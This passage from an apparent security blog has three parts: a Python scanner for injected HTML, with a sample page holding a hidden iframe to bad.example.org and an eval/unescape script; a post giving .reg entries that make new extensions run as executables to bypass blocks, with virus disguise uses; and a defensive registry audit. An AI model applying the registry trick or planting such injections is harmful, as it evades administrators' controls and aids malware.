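            if "display:none" in style or "visibility:hidden" in style or tiny:
                self.findings.append(f"hidden iframe to {a.get('src', '?')}")
        elif tag == "script":
            self._in_script = True
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host and host not in self.allowed_hosts:     # relative URLs have no host
                self.findings.append(f"off-site script from {host}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies are delivered here; flag the classic obfuscation wrappers
        if self._in_script and ("eval(unescape(" in data or "document.write(unescape(" in data):
            self.findings.append("obfuscated inline script (eval/unescape)")


def scan_html(text: str, allowed_hosts: Set[str]) -> List[str]:
    """Return a list of findings for one HTML document (empty list means nothing flagged)."""
    scanner = InjectionScanner(allowed_hosts)
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed sample page: one legitimate CDN script, one hidden iframe, one obfuscated script.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="/js/app.js"></script>
<script src="https://cdn.example.net/jquery.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://bad.example.org/in.php" width="1" height="1" style="display:none"></iframe>
<script>eval(unescape('%61%6c%65%72%74%28%31%29'));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, {"cdn.example.net"}):
        print(finding)
```

Run this over every HTML and PHP template you are about to upload, with `allowed_hosts` set to the CDNs you actually use; anything it flags in a file you did not change is the injected script the post is talking about, and the same file on the server should be compared with your local copy before you request the review.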
Posted in Malware, Tutorial by buzz
As we know, Windows only recognises a few file types as executable: .exe, .com, .scr and .pif. What if we want to create a new executable extension, for example .ext, so that a file named Anti.ext behaves just like Anti.exe? The use of this technique is to get around blocks on running .exe, .scr and .com files: if a program such as msconfig.exe is blocked because of its .exe extension, we can still run it by changing the extension, for example to msconfig.ext.
Doing this is very easy; we only need to add a new key to the registry. For example, to make a new extension behave like an .exe file, the .reg file to import is:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.EVA]
@="exefile"
So the general format is:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.EKSTENSIBARU]
@="exefile" (to behave like an .exe file), or
@="scrfile" (to behave like a .scr file)
To behave like a .com file, the PersistentHandler key must also be added in the .reg file. This technique can also be used by a virus to defend itself on a computer, namely by:
1. Changing the handling of a dangerous file type, for example binding .jpg to exefile, while the virus attaches itself to the real .jpg file without changing its extension and the genuine image data is given a different extension, for example .tmp.
2. Disguising itself as a file that looks harmless so that it is hard to detect, for example a virus using the extension .d11, which at a glance looks like .dll.
Note:
To change the icon, for example for .scr files, which normally each carry their own icon, so that the .scr file uses an icon from elsewhere (for example a Windows property icon) without recompiling the .scr file, we need to change the registry value under the key:
[HKEY_CLASSES_ROOT\SCRFILE]
namely the DefaultIcon value, from %1 to, for example:
%SystemRoot%\System32\Shell32.dll,-154
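Since the registry mapping described above is exactly what a virus abuses, a defender's check is to list which extensions Windows currently hands to an executable ProgID and compare them with the expected set. The Python below is an added example, not from the original post: on Windows it reads HKEY_CLASSES_ROOT through the standard-library winreg module, and elsewhere (and in the test) it works on a constructed mapping. The EXPECTED table, the function names and the sample mapping are assumptions; the ProgID names in the table are those of a default installation, so adjust it to your own baseline.

```python
"""List file extensions whose default handler is an executable ProgID (defender's audit)."""
import sys
from typing import Dict, List

# Extensions Windows is expected to route to executable handlers. The page names
# exe, com, scr and pif; the ProgID names and the bat/cmd entries are assumptions
# taken from a default installation.
EXPECTED: Dict[str, str] = {
    ".exe": "exefile", ".com": "comfile", ".scr": "scrfile",
    ".pif": "piffile", ".bat": "batfile", ".cmd": "cmdfile",
}
EXECUTABLE_PROGIDS = set(EXPECTED.values())


def find_unexpected_handlers(mapping: Dict[str, str]) -> List[str]:
    """Return 'ext -> progid' for every extension bound to an executable ProgID that is
    not the expected one for that extension (for example .ext or .jpg -> exefile)."""
    findings = []
    for ext, progid in sorted(mapping.items()):
        p = (progid or "").strip().lower()
        if p in EXECUTABLE_PROGIDS and EXPECTED.get(ext.lower()) != p:
            findings.append(f"{ext} -> {progid}")
    return findings


def read_hkcr_extensions() -> Dict[str, str]:
    """Enumerate HKEY_CLASSES_ROOT\\.<ext> keys and read each key's default value (Windows only)."""
    import winreg   # standard library, present only on Windows
    mapping: Dict[str, str] = {}
    index = 0
    while True:
        try:
            name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, index)
        except OSError:
            break                       # no more subkeys
        index += 1
        if name.startswith("."):
            try:
                mapping[name] = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, name)
            except OSError:
                pass                    # key without a readable default value
    return mapping


# Constructed sample of what the enumeration might return after the .reg trick above.
SAMPLE_MAPPING = {
    ".exe": "exefile", ".scr": "scrfile", ".txt": "txtfile",
    ".ext": "exefile", ".jpg": "exefile", ".d11": "dllfile",
}

if __name__ == "__main__":
    mapping = read_hkcr_extensions() if sys.platform == "win32" else SAMPLE_MAPPING
    for line in find_unexpected_handlers(mapping) or ["no unexpected executable handlers"]:
        print(line)
```

The .d11 case in the sample is deliberately not flagged: its handler is not executable, so this check does not catch look-alike extensions, only the registry binding part of the technique. Catching the look-alike needs a different rule (for example, listing extensions that differ from a known one by a single confusable character), which is why the audit is split into a pure function that can be extended and a separate registry reader.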
Posted in Tutorial, Virus by buzz